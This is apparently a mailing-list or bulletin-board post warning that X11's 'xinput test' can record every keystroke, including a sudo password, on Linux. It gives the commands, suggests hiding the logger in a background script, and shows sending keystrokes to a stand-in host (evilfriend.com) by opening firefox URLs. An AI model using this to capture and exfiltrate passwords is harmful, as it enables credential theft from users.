To my surprise it is very simple to log your sudo password. Here are instructions to test it yourself. It is very simple to echo it to a log
file in a hidden background process from a shell script too if you want.
Open a terminal and type this:
~$ xinput --list
AT Translated Set 2 keyboard id=15 [slave keyboard (3)]
You will see devices listed, from which one is your keyboard.
Then do this from the id=15 you found:
$ xinput test 16
Now in another terminal window type in:
$ sudo apt update
[sudo] password for user:
You will see that everything which you type including your passwords
shows up.
Now imagine that! Such a script can easily do the following.
Instead of logging we will use in this example firefox installed on a
system and send every echo to a website by opening firefox after every keystroke
example:
$ firefox https://evilfriend.com/chuckythegoodguy/M
$ firefox https://evilfriend.com/chuckythegoodguy/y
$ firefox https://evilfriend.com/chuckythegoodguy/P
$ firefox https://evilfriend.com/chuckythegoodguy/a
$ firefox https://evilfriend.com/chuckythegoodguy/S
I call this Your Evilfriend Attack!
You will need:
$ xmodmap -pke
Have a nice day!
Sorry I didn´t know that the https://evilfriend.com website really
exists.
On 01.12.21 02:25, user wrote:
Have a nice day!
Sysop: | Keyop |
---|---|
Location: | Huddersfield, West Yorkshire, UK |
Users: | 296 |
Nodes: | 16 (3 / 13) |
Uptime: | 49:41:49 |
Calls: | 6,649 |
Calls today: | 1 |
Files: | 12,200 |
Messages: | 5,330,100 |